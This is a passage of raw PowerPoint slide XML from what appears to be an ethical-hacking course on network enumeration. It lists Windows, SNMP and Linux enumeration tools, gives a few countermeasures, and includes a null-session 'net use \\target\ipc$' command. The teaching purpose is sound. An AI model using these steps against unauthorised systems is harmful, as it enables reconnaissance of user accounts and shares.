                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Net use \\target\ipc$  “””” /u:””</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The amount of information collected depends on the version of Windows running and the configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Older Windows systems reveal more information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>  DumpSec:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Windows-based GUI tool </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can connect to a Windows system remotely and obtain user account information and share permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>GetAcct:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Connect to target by IP or NetBIOS name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Extract account information such as SID, RID, comments, full names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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180038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305800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Enumeration Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SID2USER and USER2SID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Obtain account name from SID and SID from the account name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SuperScan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Retrieved information about any known user from a vulnerable system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Userinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Retrieves information for users in NT/2000/XP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>GetAcct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>GUI tool used to enumerate Windows systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>GetUserInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Command-line toll that extracts user account info from a compute or domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Ldp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can be used to enumerate all users in built-in groups in AD if port 389 is open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Nbtstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Built-in Windows command tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Used to troubleshoot NetBIOS name resolution problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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346075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>
          <a:xfrm>
            <a:off x="76200" y="274638"/>
            <a:ext cx="8915400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Simple Network Management Protocol (SNMP) Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411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52988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altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SNMP is a TCP/IP protocol used for remote management:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Version 3 offers encryption and authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Versions 1 and 2 are vulnerable to attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Tools for SNMP enumeration:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>snmpwalk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>IP Network Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SNScan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Countermeasures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Turn off SNMP if not in use or use version 3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Block port 161.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Change community strings and have different community string for each network zone. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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056240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534400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Linux and UNIX Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843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400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Not as vulnerable to enumeration as Windows systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Rpcclient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Showmount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Finger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Rpfinfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Enum4linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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11320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pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>NTP Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459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08525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NTP – protocol used to synchronize clocks on network computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Uses UDP port 123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NTP commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
